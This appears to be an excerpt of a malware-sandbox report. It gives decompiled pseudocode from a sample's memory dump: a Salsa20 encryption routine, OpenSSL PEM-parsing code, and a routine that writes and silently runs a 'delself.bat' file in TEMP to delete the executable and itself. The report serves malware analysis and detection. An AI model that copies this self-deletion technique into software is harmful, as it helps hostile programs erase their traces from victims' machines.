					_t309 = _t293;
					if(_t293 == 0) {
						goto L2;
					}
				}
				if(_a12 != 0) {
					_v128 = _t174 -  &_v190;
					_push(_t297);
					do {
						asm("movdqu xmm0, [eax]");
						_v60 = 0xa;
						asm("movdqu [ebp-0x78], xmm0");
						asm("movdqu xmm0, [eax+0x10]");
						asm("movdqu [ebp-0x68], xmm0");
						asm("movdqu xmm0, [eax+0x20]");
						asm("movdqu [ebp-0x58], xmm0");
						_t294 = _v80;
						asm("movdqu xmm0, [eax+0x30]");
						_v8 = _v84;
						_v36 = _v88;
						_v16 = _v92;
						_v48 = _v96;
						_v44 = _v100;
						_v32 = _v104;
						_v12 = _v108;
						_v40 = _v112;
						asm("movdqu [ebp-0x48], xmm0");
						_t252 = _v76;
						_t276 = _v64;
						_t288 = _v68;
						_t298 = _v72;
						_v28 = _v116;
						_v24 = _v120;
						_t186 = _v124;
						_v52 = _t252;
						_v20 = _t186;
						do {
							asm("rol eax, 0x7");
							_v12 = _v12 ^ _t186 + _t252;
							asm("rol eax, 0x9");
							_v16 = _v16 ^ _v12 + _v20;
							asm("rol eax, 0xd");
							_t254 = _v52 ^ _v16 + _v12;
							_v52 = _t254;
							asm("ror eax, 0xe");
							_v20 = _v20 ^ _v16 + _t254;
							asm("rol eax, 0x7");
							_v36 = _v36 ^ _v24 + _v32;
							asm("rol eax, 0x9");
							_t299 = _t298 ^ _v36 + _v32;
							_t255 = _v44;
							asm("rol eax, 0xd");
							_v24 = _v24 ^ _v36 + _t299;
							asm("ror eax, 0xe");
							_v32 = _v32 ^ _v24 + _t299;
							asm("rol eax, 0x7");
							_t289 = _t288 ^ _v8 + _t255;
							asm("rol eax, 0x9");
							_v28 = _v28 ^ _v8 + _t289;
							asm("rol eax, 0xd");
							_t256 = _t255 ^ _v28 + _t289;
							_v44 = _t256;
							asm("ror eax, 0xe");
							_v8 = _v8 ^ _v28 + _t256;
							asm("rol eax, 0x7");
							_t258 = _v40 ^ _t294 + _t276;
							_v40 = _t258;
							asm("rol eax, 0x9");
							_t260 = _v48 ^ _t258 + _t276;
							_v48 = _t260;
							asm("rol eax, 0xd");
							_t295 = _t294 ^ _v40 + _t260;
							asm("ror eax, 0xe");
							_t277 = _t276 ^ _t260 + _t295;
							asm("rol eax, 0x7");
							_v24 = _v24 ^ _v20 + _v40;
							_t217 = _v24;
							_v120 = _t217;
							asm("rol eax, 0x9");
							_v28 = _v28 ^ _t217 + _v20;
							_t219 = _v28;
							_v116 = _t219;
							asm("rol eax, 0xd");
							_t262 = _v40 ^ _t219 + _v24;
							_v40 = _t262;
							asm("ror eax, 0xe");
							_v112 = _t262;
							_t264 = _v20 ^ _v28 + _t262;
							asm("rol eax, 0x7");
							_v44 = _v44 ^ _v32 + _v12;
							_t225 = _v44;
							_v100 = _t225;
							asm("rol eax, 0x9");
							_v20 = _t264;
							_v124 = _t264;
							_t266 = _v48 ^ _t225 + _v32;
							_v48 = _t266;
							asm("rol eax, 0xd");
							_v12 = _v12 ^ _v44 + _t266;
							_t229 = _v12;
							_v108 = _t229;
							asm("ror eax, 0xe");
							_v96 = _t266;
							_t268 = _v32 ^ _t229 + _t266;
							_v32 = _t268;
							_v104 = _t268;
							_t269 = _v36;
							asm("rol eax, 0x7");
							_t294 = _t295 ^ _v8 + _t269;
							asm("rol eax, 0x9");
							_v16 = _v16 ^ _v8 + _t294;
							_t235 = _v16;
							_v92 = _t235;
							asm("rol eax, 0xd");
							_t270 = _t269 ^ _t235 + _t294;
							_t237 = _t270;
							_v36 = _t270;
							_v88 = _t237;
							asm("ror eax, 0xe");
							_v8 = _v8 ^ _t237 + _v16;
							_v84 = _v8;
							asm("rol eax, 0x7");
							_t252 = _v52 ^ _t277 + _t289;
							_v52 = _t252;
							_v76 = _t252;
							asm("rol eax, 0x9");
							_t298 = _t299 ^ _t277 + _t252;
							asm("rol eax, 0xd");
							_t288 = _t289 ^ _t298 + _t252;
							asm("ror eax, 0xe");
							_t276 = _t277 ^ _t288 + _t298;
							_t138 =  &_v60;
							 *_t138 = _v60 - 1;
							_t186 = _v20;
						} while ( *_t138 != 0);
						_t272 = _a4;
						_t244 = 0;
						_v80 = _t294;
						_t296 = _a8;
						_v64 = _t276;
						_v68 = _t288;
						_v72 = _t298;
						do {
							_t301 =  &_v190 + _t244;
							 *(_t305 + _t244 - 0x78) =  *(_t305 + _t244 - 0x78) +  *((intOrPtr*)(_t301 + _v128));
							_t290 =  *(_t305 + _t244 - 0x78);
							 *((char*)(_t301 - 1)) = _t290 >> 8;
							 *(_t305 + _t244 - 0xbc) = _t290;
							_t244 = _t244 + 4;
							 *_t301 = _t290 >> 0x10;
							 *((char*)(_t301 + 1)) = _t290 >> 0x18;
							_t313 = _t244 - 0x40;
						} while (_t313 < 0);
						_t284 = _v56;
						_t292 = _a12;
						 *((intOrPtr*)(_t284 + 0x20)) =  *((intOrPtr*)(_t284 + 0x20)) + 1;
						 *((intOrPtr*)(_t284 + 0x24)) =  *((intOrPtr*)(_t284 + 0x24)) + (0 | _t313 == 0x00000000);
						_t303 =  >=  ? 0x40 : _t292;
						_t285 = 0;
						if(_t303 == 0) {
							goto L12;
						} else {
							goto L10;
						}
						do {
							L10:
							_t292 = _t292 - 1;
							_t250 =  *(_t305 + _t285 - 0xbc) ^  *_t272;
							_t285 = _t285 + 1;
							 *_t296 = _t250;
							_t272 =  &(_t272[0]);
							_t296 =  &(_t296[1]);
						} while (_t285 < _t303);
						_a12 = _t292;
						_a4 = _t272;
						_a8 = _t296;
						L12:
						_t248 = _v56;
					} while (_t292 != 0);
					return _t248;
				}
				return _t174;
			}

0x0040c070
0x0040c070
0x0040c07a
0x0040c07d
0x0040c07f
0x0040c083
0x0040c088
0x0040c08e
0x0040c08e
0x0040c09a
0x0040c09f
0x0040c08a
0x0040c08a
0x0040c08c
0x00000000
0x00000000
0x0040c08c
0x0040c0a9
0x0040c0b9
0x0040c0bc
0x0040c0c0
0x0040c0c0
0x0040c0c4
0x0040c0cb
0x0040c0d0
0x0040c0d5
0x0040c0da
0x0040c0df
0x0040c0e4
0x0040c0e7
0x0040c0ef
0x0040c0f5
0x0040c0fb
0x0040c101
0x0040c107
0x0040c10d
0x0040c113
0x0040c119
0x0040c11f
0x0040c124
0x0040c127
0x0040c12a
0x0040c12d
0x0040c130
0x0040c136
0x0040c139
0x0040c13c
0x0040c13f
0x0040c142
0x0040c147
0x0040c14a
0x0040c153
0x0040c156
0x0040c15f
0x0040c162
0x0040c169
0x0040c16c
0x0040c16f
0x0040c178
0x0040c17b
0x0040c184
0x0040c187
0x0040c189
0x0040c191
0x0040c194
0x0040c19c
0x0040c19f
0x0040c1a7
0x0040c1aa
0x0040c1b1
0x0040c1b4
0x0040c1bc
0x0040c1bf
0x0040c1c6
0x0040c1cc
0x0040c1cf
0x0040c1d5
0x0040c1d8
0x0040c1da
0x0040c1e3
0x0040c1e6
0x0040c1ed
0x0040c1f0
0x0040c1f3
0x0040c1f8
0x0040c1fb
0x0040c203
0x0040c206
0x0040c209
0x0040c20c
0x0040c212
0x0040c215
0x0040c218
0x0040c21b
0x0040c221
0x0040c227
0x0040c22e
0x0040c231
0x0040c234
0x0040c23a
0x0040c242
0x0040c245
0x0040c248
0x0040c24b
0x0040c251
0x0040c254
0x0040c257
0x0040c25d
0x0040c264
0x0040c267
0x0040c26a
0x0040c26d
0x0040c270
0x0040c275
0x0040c278
0x0040c27e
0x0040c283
0x0040c286
0x0040c289
0x0040c28e
0x0040c291
0x0040c298
0x0040c29b
0x0040c29e
0x0040c2a1
0x0040c2a6
0x0040c2a9
0x0040c2ab
0x0040c2ad
0x0040c2b3
0x0040c2b9
0x0040c2bc
0x0040c2c2
0x0040c2c8
0x0040c2cb
0x0040c2cd
0x0040c2d0
0x0040c2d6
0x0040c2d9
0x0040c2de
0x0040c2e1
0x0040c2e6
0x0040c2e9
0x0040c2eb
0x0040c2eb
0x0040c2ee
0x0040c2ee
0x0040c2f7
0x0040c2fa
0x0040c2fc
0x0040c2ff
0x0040c302
0x0040c305
0x0040c308
0x0040c310
0x0040c319
0x0040c31e
0x0040c322
0x0040c32b
0x0040c330
0x0040c337
0x0040c340
0x0040c342
0x0040c345
0x0040c345
0x0040c34a
0x0040c352
0x0040c357
0x0040c35d
0x0040c368
0x0040c36b
0x0040c36f
0x00000000
0x00000000
0x00000000
0x00000000
0x0040c371
0x0040c371
0x0040c378
0x0040c379
0x0040c37b
0x0040c37c
0x0040c37e
0x0040c37f
0x0040c380
0x0040c384
0x0040c387
0x0040c38a
0x0040c38d
0x0040c38d
0x0040c390
0x00000000
0x0040c398
0x0040c39e

APIs

__wassert.LIBCMT ref: 0040C09A

Strings

input != nullptr && output != nullptr, xrefs: 0040C095
e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl, xrefs: 0040C090

Memory Dump Source

Source File: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.309223567.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.309229588.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_U59WtZz2Sg.jbxd

Yara matches

Similarity

API ID: __wassert
String ID: e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl$input != nullptr && output != nullptr
API String ID: 3993402318-1975116136
Opcode ID: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
Instruction ID: 1562121ec4d7abfac7b8d7a3269f54288592c24a15d8ca99342f0f863a8d7c6a
Opcode Fuzzy Hash: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
Instruction Fuzzy Hash: 43C18C75E002599FCB54CFA9C885ADEBBF1FF48300F24856AE919E7301E334AA558B54

Uniqueness

Uniqueness Score: -1.00%

Function 004124E0 Relevance: 79.0, APIs: 36, Strings: 9, Instructions: 214
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E004124E0() {
				long _v8;
				struct _PROCESS_INFORMATION _v24;
				struct _STARTUPINFOA _v100;
				char _v364;
				char _v628;
				void _v1668;
				char _v1932;
				char _v2956;
				long _t40;
				signed int _t48;
				void* _t78;
				intOrPtr _t79;
				int _t104;
				long _t106;
				int _t108;
				void* _t110;
				intOrPtr* _t113;
				void* _t115;

				if( *0x513234 == 0) {
					 *0x513230 = CreateMutexA(0, 0, "{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}");
					_t40 = GetLastError();
					_push( *0x513230);
					if(_t40 != 0xb7) {
						CloseHandle();
						 *0x513230 = 0;
						goto L7;
					} else {
						_t104 = CloseHandle();
						 *0x513230 = 0;
						return _t104;
					}
				} else {
					 *0x513238 = CreateMutexA(0, 0, "{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}");
					_t106 = GetLastError();
					_push( *0x513238);
					if(_t106 != 0xb7) {
						CloseHandle();
						 *0x513238 = 0;
						L7:
						if(E00412360() == 0) {
							GetModuleFileNameA(0,  &_v628, 0x104);
							GetShortPathNameA( &_v628,  &_v628, 0x104);
							_t48 = GetEnvironmentVariableA("TEMP",  &_v1932, 0x104);
							asm("sbb eax, eax");
							lstrcpyA( &_v364, _t48 &  &_v1932);
							lstrcatA( &_v364, "\\");
							lstrcatA( &_v364, "delself.bat");
							lstrcpyA( &_v1668, "@echo off\r\n:try\r\ndel \"");
							lstrcatA( &_v1668,  &_v628);
							lstrcatA( &_v1668, "\"\r\nif exist \"");
							lstrcatA( &_v1668,  &_v628);
							lstrcatA( &_v1668, "\" goto try\r\n");
							lstrcatA( &_v1668, "del \"");
							lstrcatA( &_v1668,  &_v364);
							lstrcatA( &_v1668, "\"");
							if(PathFileExistsA( &_v364) != 0) {
								DeleteFileA( &_v364);
							}
							_t78 = CreateFileA( &_v364, 0xc0000000, 3, 0, 2, 0x80, 0);
							_t113 =  &_v1668;
							_t110 = _t78;
							_t115 = _t113 + 1;
							do {
								_t79 =  *_t113;
								_t113 = _t113 + 1;
							} while (_t79 != 0);
							WriteFile(_t110,  &_v1668, _t113 - _t115,  &_v8, 0);
							FlushFileBuffers(_t110);
							CloseHandle(_t110);
							E0042B420( &_v100, 0, 0x44);
							_v100.cb = 0x44;
							_v100.dwFlags = 1;
							_v100.wShowWindow = 0;
							SetLastError(0);
							lstrcpyA( &_v2956, "\"");
							lstrcatA( &_v2956,  &_v364);
							lstrcatA( &_v2956, "\"");
							CreateProcessA(0,  &_v2956, 0, 0, 0, 0, 0, 0,  &_v100,  &_v24);
							CloseHandle(_v24.hThread);
							return CloseHandle(_v24);
						} else {
							return E00412440();
						}
					} else {
						_t108 = CloseHandle();
						 *0x513238 = 0;
						return _t108;
					}
				}
			}

0x004124f3
0x00412556
0x0041255b
0x00412561
0x0041256c
0x0041258b
0x0041258d
0x00000000
0x0041256e
0x0041256e
0x00412574
0x00412584
0x00412584
0x004124f5
0x00412504
0x00412509
0x0041250f
0x0041251a
0x00412539
0x0041253b
0x00412597
0x0041259e
0x004125ba
0x004125cd
0x004125e4
0x004125fa
0x00412606
0x0041261a
0x00412628
0x00412636
0x00412646
0x00412654
0x00412664
0x00412672
0x00412680
0x00412690
0x0041269e
0x004126af
0x004126b8
0x004126b8
0x004126d7
0x004126dd
0x004126e3
0x004126e5
0x004126e8
0x004126e8
0x004126ea
0x004126eb
0x00412700
0x00412707
0x0041270e
0x00412718
0x00412720
0x00412729
0x00412730
0x00412735
0x00412747
0x0041275b
0x00412769
0x00412788
0x00412791
0x0041279e
0x004125a0
0x004125ab
0x004125ab
0x0041251c
0x0041251c
0x00412522
0x00412532
0x00412532
0x0041251a

APIs

CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 004124FE
GetLastError.KERNEL32 ref: 00412509
CloseHandle.KERNEL32 ref: 0041251C
CloseHandle.KERNEL32 ref: 00412539
CreateMutexA.KERNEL32(00000000,00000000,{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}), ref: 00412550
GetLastError.KERNEL32 ref: 0041255B
CloseHandle.KERNEL32 ref: 0041256E

Strings

{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}, xrefs: 004124F5
@echo off:trydel ", xrefs: 0041262A
" goto try, xrefs: 00412666
{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}, xrefs: 00412547
del ", xrefs: 00412674
D, xrefs: 00412720
"if exist ", xrefs: 00412648
delself.bat, xrefs: 0041261C
TEMP, xrefs: 004125DF

Memory Dump Source

Source File: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.309223567.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.309229588.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_U59WtZz2Sg.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreateErrorLastMutex
String ID: "if exist "$" goto try$@echo off:trydel "$D$TEMP$del "$delself.bat${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
API String ID: 2372642624-488272950
Opcode ID: 4506a078386c228e7a8f507305766ec05e664451a55683de5f3f64ca7fb9d614
Instruction ID: b8d6f70f31989c1caf7dd59f8aefe182ce9601728b58fe5e15313657dd94e056
Opcode Fuzzy Hash: 4506a078386c228e7a8f507305766ec05e664451a55683de5f3f64ca7fb9d614
Instruction Fuzzy Hash: 03714E72940218AADF50ABE1DC89FEE7BACFB44305F0445A6F609D2090DF759A88CF64

Uniqueness

Uniqueness Score: -1.00%

Function 004635B0 Relevance: 21.5, APIs: 7, Strings: 5, Instructions: 475
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 56%

			E004635B0(void* __ebx, intOrPtr* __edx, void* __ebp, char _a4, char _a8, intOrPtr _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr* _a24, intOrPtr* _a28, char _a32, char _a36, char _a132, char _a137, char _a141, char _a143, char _a386, signed int _a388, intOrPtr _a396, intOrPtr* _a400, intOrPtr* _a404, intOrPtr* _a408, intOrPtr* _a412) {
				intOrPtr _v0;
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				void* __edi;
				void* __esi;
				signed int _t125;
				void* _t141;
				void* _t146;
				void* _t151;
				void* _t157;
				intOrPtr _t159;
				void* _t162;
				intOrPtr _t164;
				intOrPtr _t168;
				intOrPtr _t169;
				intOrPtr _t173;
				intOrPtr _t176;
				intOrPtr _t178;
				intOrPtr _t180;
				intOrPtr _t183;
				char _t186;
				intOrPtr _t188;
				intOrPtr _t193;
				intOrPtr _t206;
				intOrPtr _t210;
				intOrPtr _t218;
				void* _t219;
				intOrPtr _t222;
				intOrPtr _t224;
				char _t236;
				void* _t237;
				void* _t240;
				void* _t241;
				intOrPtr _t244;
				intOrPtr _t251;
				void* _t252;
				intOrPtr _t253;
				intOrPtr _t257;
				void* _t258;
				intOrPtr* _t261;
				intOrPtr _t262;
				intOrPtr _t263;
				intOrPtr _t264;
				intOrPtr* _t265;
				void* _t266;
				intOrPtr _t267;
				intOrPtr _t269;
				signed int _t271;
				signed int _t272;
				void* _t274;
				void* _t275;
				void* _t279;
				void* _t280;
				void* _t284;

				_t247 = __edx;
				E0042F7C0(0x188);
				_t125 =  *0x50ad20; // 0x4ea20c1c
				_a388 = _t125 ^ _t271;
				_push(__ebx);
				_a16 = _a400;
				_push(__ebp);
				_a28 = _a404;
				_t251 = _a396;
				_a20 = _a408;
				_a12 = _t251;
				_a24 = _a412;
				_a4 = 0;
				_t236 = E0045AF30(__ebx, __edx, _t251);
				_a8 = _t236;
				_t257 = E0045AF30(_t236, __edx, _t251);
				_v0 = _t257;
				_t269 = E0045AF30(_t236, __edx, _t251);
				if(_t236 == 0 || _t257 == 0 || _t269 == 0) {
					E0045AD10(_t236);
					E0045AD10(_t257);
					E0045AD10(_t269);
					E004512D0(_t236, _t247, _t251, _t269, __eflags, 9, 0x6d, 0x41, ".\\crypto\\pem\\pem_lib.c", 0x2b4);
					_t272 = _t271 + 0x20;
					goto L72;
				} else {
					_a386 = 0;
					_t141 = E0044F780(_t251, _t269, _t251,  &_a132, 0xfe);
					_t274 = _t271 + 0xc;
					_t284 = _t141;
					if(_t284 <= 0) {
						L14:
						_push(0x2bf);
						_push(".\\crypto\\pem\\pem_lib.c");
						_push(0x6c);
						goto L15;
					} else {
						do {
							if(_t284 >= 0) {
								while( *((char*)(_t274 + _t141 + 0x94)) <= 0x20) {
									_t141 = _t141 - 1;
									if(_t141 >= 0) {
										continue;
									}
									goto L8;
								}
							}
							L8:
							 *((char*)(_t274 + _t141 + 0x95)) = 0xa;
							_t146 = _t141 + 2;
							if(_t146 >= 0x100) {
								L74:
								E0042AC83();
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								_push(_t251);
								_t253 = E0044F960(_t236, _t247, E004656B0());
								__eflags = _t253;
								if(__eflags != 0) {
									_push(_t257);
									E0044F3E0(_t253, _t269, _t253, 0x6a, 0, _v12);
									_push(_a4);
									_push(_v0);
									_push(_v4);
									_push(_v8);
									_push(_t253);
									_t151 = E00463C30(_t247, _t269);
									E0044F5E0(_t253);
									return _t151;
								} else {
									E004512D0(_t236, _t247, _t253, _t269, __eflags, 9, 0x71, 7, ".\\crypto\\pem\\pem_lib.c", 0x248);
									__eflags = 0;
									return 0;
								}
							} else {
								 *((char*)(_t274 + _t146 + 0x98)) = 0;
								_t157 = E00448190( &_a132, "-----BEGIN ", 0xb);
								_t279 = _t274 + 0xc;
								if(_t157 != 0) {
									goto L13;
								} else {
									_t261 =  &_a143;
									_t240 = _t261 + 1;
									do {
										_t159 =  *_t261;
										_t261 = _t261 + 1;
									} while (_t159 != 0);
									_t257 = _t261 - _t240;
									_t162 = E00448190( &_a137 + _t257, "-----\n", 6);
									_t279 = _t279 + 0xc;
									if(_t162 == 0) {
										_t164 = E0045AD50(_t236, _t247, _t269, _t236, _t257 + 9);
										_t274 = _t279 + 8;
										__eflags = _t164;
										if(__eflags != 0) {
											E0042D8D0( *((intOrPtr*)(_t236 + 4)),  &_a143, _t257 - 6);
											_t168 =  *((intOrPtr*)(_t236 + 4));
											_t236 = 0;
											 *((char*)(_t168 + _t257 - 6)) = 0;
											_t262 = _v0;
											_t169 = E0045AD50(0, _t247, _t269, _t262, 0x100);
											_t274 = _t274 + 0x14;
											__eflags = _t169;
											if(__eflags != 0) {
												 *((char*)( *((intOrPtr*)(_t262 + 4)))) = 0;
												_t263 = E0044F780(_t251, _t269, _t251,  &_a132, 0xfe);
												_t274 = _t274 + 0xc;
												__eflags = _t263;
												if(__eflags <= 0) {
													L32:
													_t264 = 0;
													__eflags = 0;
													goto L33;
												} else {
													do {
														if(__eflags >= 0) {
															while(1) {
																__eflags =  *((char*)(_t274 + _t263 + 0x94)) - 0x20;
																if( *((char*)(_t274 + _t263 + 0x94)) > 0x20) {
																	goto L27;
																}
																_t263 = _t263 - 1;
																__eflags = _t263;
																if(_t263 >= 0) {
																	continue;
																}
																goto L27;
															}
														}
														L27:
														 *((char*)(_t274 + _t263 + 0x95)) = 0xa;
														_t257 = _t263 + 2;
														__eflags = _t257 - 0x100;
														if(_t257 >= 0x100) {
															goto L74;
														} else {
															 *((char*)(_t274 + _t257 + 0x94)) = 0;
															__eflags = _a132 - 0xa;
															if(_a132 == 0xa) {
																goto L32;
															} else {
																_t251 = _t257 + _t236;
																_t222 = E0045AD50(_t236, _t247, _t269, _v0, _t251 + 9);
																_t274 = _t274 + 8;
																__eflags = _t222;
																if(__eflags == 0) {
																	_push(0x2e4);
																	goto L22;
																} else {
																	_t224 = E00448190( &_a132, "-----END ", 9);
																	_t274 = _t274 + 0xc;
																	__eflags = _t224;
																	if(_t224 == 0) {
																		_t251 = _a12;
																		_t264 = 1;
																		L33:
																		_a4 = 0;
																		_t173 = E0045AD50(_t236, _t247, _t269, _t269, 0x400);
																		_t274 = _t274 + 8;
																		__eflags = _t173;
																		if(__eflags != 0) {
																			 *_a4 = 0;
																			__eflags = _t264;
																			if(_t264 != 0) {
																				_t251 = _t269;
																				_v0 = _t251;
																				_t269 = _v0;
																				_a4 = _t236;
																				goto L51;
																			} else {
																				_t267 = E0044F780(_t251, _t269, _t251,  &_a132, 0xfe);
																				_t274 = _t274 + 0xc;
																				__eflags = _t267;
																				if(_t267 <= 0) {
																					L50:
																					_t251 = _v0;
																					L51:
																					_t236 = _a8;
																					_t265 =  *((intOrPtr*)(_t236 + 4));
																					_t83 = _t265 + 1; // 0x9
																					_t241 = _t83;
																					do {
																						_t176 =  *_t265;
																						_t265 = _t265 + 1;
																						__eflags = _t176;
																					} while (_t176 != 0);
																					_t266 = _t265 - _t241;
																					_t178 = E00448190( &_a132, "-----END ", 9);
																					_t274 = _t274 + 0xc;
																					__eflags = _t178;
																					if(__eflags != 0) {
																						L70:
																						_push(0x322);
																						_push(".\\crypto\\pem\\pem_lib.c");
																						_push(0x66);
																						goto L15;
																					} else {
																						_t180 = E00448190( *((intOrPtr*)(_t236 + 4)),  &_a141, _t266);
																						_t274 = _t274 + 0xc;
																						__eflags = _t180;
																						if(__eflags != 0) {
																							goto L70;
																						} else {
																							_t183 = E00448190( &_a141 + _t266, "-----\n", 6);
																							_t274 = _t274 + 0xc;
																							__eflags = _t183;
																							if(__eflags != 0) {
																								goto L70;
																							} else {
																								E0047E5B0( &_a36);
																								_push(_a4);
																								_t186 = _a4;
																								_push(_t186);
																								_push( &_a4);
																								_push(_t186);
																								_push( &_a36);
																								_t188 = E0047E5D0();
																								_t274 = _t274 + 0x18;
																								__eflags = _t188;
																								if(__eflags >= 0) {
																									_t193 = E0047E560( &_a36, _a4 + _a4,  &_a32);
																									_t275 = _t274 + 0xc;
																									__eflags = _t193;
																									if(__eflags >= 0) {
																										_t244 = _a4 + _a32;
																										__eflags = _t244;
																										_a4 = _t244;
																										if(_t244 == 0) {
																											goto L17;
																										} else {
																											 *_a16 =  *((intOrPtr*)(_t236 + 4));
																											 *_a28 =  *((intOrPtr*)(_t251 + 4));
																											_t247 = _a20;
																											 *_a20 = _a4;
																											 *_a24 = _t244;
																											E00454C70(_t236);
																											E00454C70(_t251);
																											E00454C70(_t269);
																											_t272 = _t275 + 0xc;
																										}
																									} else {
																										_push(0x332);
																										_push(".\\crypto\\pem\\pem_lib.c");
																										_push(0x64);
																										goto L15;
																									}
																								} else {
																									_push(0x32c);
																									_push(".\\crypto\\pem\\pem_lib.c");
																									_push(0x64);
																									goto L15;
																								}
																							}
																						}
																					}
																					goto L73;
																				} else {
																					_t236 = 0;
																					__eflags = _t267;
																					do {
																						if(__eflags >= 0) {
																							while(1) {
																								__eflags =  *((char*)(_t274 + _t267 + 0x94)) - 0x20;
																								if( *((char*)(_t274 + _t267 + 0x94)) > 0x20) {
																									goto L44;
																								}
																								_t267 = _t267 - 1;
																								__eflags = _t267;
																								if(_t267 >= 0) {
																									continue;
																								}
																								goto L44;
																							}
																						}
																						L44:
																						 *((char*)(_t274 + _t267 + 0x95)) = 0xa;
																						_t257 = _t267 + 2;
																						__eflags = _t257 - 0x100;
																						if(_t257 >= 0x100) {
																							goto L74;
																						} else {
																							__eflags = _t257 - 0x41;
																							 *((char*)(_t274 + _t257 + 0x94)) = 0;
																							_t236 =  !=  ? 1 : _t236;
																							_t206 = E00448190( &_a132, "-----END ", 9);
																							_t274 = _t274 + 0xc;
																							__eflags = _t206;
																							if(_t206 == 0) {
																								goto L50;
																							} else {
																								__eflags = _t257 - 0x41;
																								if(_t257 > 0x41) {
																									goto L50;
																								} else {
																									_t210 = E0045AE30(_t236, _t247, _t269, _t269, _a4 + 9 + _t257);
																									_t274 = _t274 + 8;
																									__eflags = _t210;
																									if(__eflags == 0) {
																										_push(0x303);
																										goto L22;
																									} else {
																										E0042D8D0(_a4 + _a4,  &_a132, _t257);
																										_t280 = _t274 + 0xc;
																										_push(0xfe);
																										 *((char*)(_a4 + _t257 + _a4)) = 0;
																										_a4 = _a4 + _t257;
																										_push( &_a132);
																										_push(_t251);
																										__eflags = _t236;
																										if(_t236 != 0) {
																											_a132 = 0;
																											_t218 = E0044F780(_t251, _t269);
																											_t274 = _t280 + 0xc;
																											__eflags = _t218;
																											if(_t218 <= 0) {
																												goto L50;
																											} else {
																												while(1) {
																													__eflags =  *((char*)(_t274 + _t218 + 0x94)) - 0x20;
																													if( *((char*)(_t274 + _t218 + 0x94)) > 0x20) {
																														break;
																													}
																													_t218 = _t218 - 1;
																													__eflags = _t218;
																													if(_t218 >= 0) {
																														continue;
																													}
																													break;
																												}
																												 *((char*)(_t274 + _t218 + 0x95)) = 0xa;
																												_t219 = _t218 + 2;
																												__eflags = _t219 - 0x100;
																												if(_t219 >= 0x100) {
																													goto L74;
																												} else {
																													 *((char*)(_t274 + _t219 + 0x94)) = 0;
																													goto L50;
																												}
																											}
																										} else {
																											goto L49;
																										}
																									}
																								}
																							}
																						}
																						goto L77;
																						L49:
																						_t267 = E0044F780(_t251, _t269);
																						_t274 = _t280 + 0xc;
																						__eflags = _t267;
																					} while (__eflags > 0);
																					goto L50;
																				}
																			}
																		} else {
																			_push(0x2f1);
																			goto L22;
																		}
																	} else {
																		goto L31;
																	}
																}
															}
														}
														goto L77;
														L31:
														E0042D8D0( *((intOrPtr*)(_v0 + 4)) + _t236,  &_a132, _t257);
														 *((char*)( *((intOrPtr*)(_v0 + 4)) + _t257 + _t236)) = 0;
														_t236 = _t251;
														_t251 = _a12;
														_t263 = E0044F780(_t251, _t269, _t251,  &_a132, 0xfe);
														_t274 = _t274 + 0x18;
														__eflags = _t263;
													} while (__eflags > 0);
													goto L32;
												}
											} else {
												_push(0x2d8);
												L22:
												_push(".\\crypto\\pem\\pem_lib.c");
												_push(0x41);
												_push(0x6d);
												_push(9);
												E004512D0(_t236, _t247, _t251, _t269, __eflags);
												_t236 = _a8;
												goto L16;
											}
										} else {
											_push(0x2ce);
											_push(".\\crypto\\pem\\pem_lib.c");
											_push(0x41);
											L15:
											_push(0x6d);
											_push(9);
											E004512D0(_t236, _t247, _t251, _t269, _t291);
											L16:
											_t275 = _t274 + 0x14;
											L17:
											E0045AD10(_t236);
											E0045AD10(_v0);
											E0045AD10(_t269);
											_t272 = _t275 + 0xc;
											L72:
											L73:
											_pop(_t252);
											_pop(_t258);
											_pop(_t237);
											return E0042A77E(_t237, _a388 ^ _t272, _t247, _t252, _t258);
										}
									} else {
										goto L13;
									}
								}
							}
							goto L77;
							L13:
							_t141 = E0044F780(_t251, _t269, _t251,  &_a132, 0xfe);
							_t274 = _t279 + 0xc;
							_t291 = _t141;
						} while (_t141 > 0);
						goto L14;
					}
				}
				L77:
			}

0x004635b0
0x004635b5
0x004635ba
0x004635c1
0x004635cf
0x004635d0
0x004635db
0x004635dc
0x004635e9
0x004635f0
0x004635fb
0x004635ff
0x00463603
0x00463610
0x00463612
0x0046361b
0x0046361d
0x00463626
0x0046362a
0x00463b6f
0x00463b75
0x00463b7b
0x00463b90
0x00463b95
0x00000000
0x00463640
0x0046364c
0x00463656
0x0046365b
0x0046365e
0x00463660
0x00463704
0x00463704
0x00463709
0x0046370e
0x00000000
0x00463666
0x00463666
0x00463666
0x00463670
0x0046367a
0x0046367b
0x00000000
0x00000000
0x00000000
0x0046367b
0x00463670
0x0046367d
0x0046367d
0x00463685
0x0046368d
0x00463bb3
0x00463bb3
0x00463bb8
0x00463bb9
0x00463bba
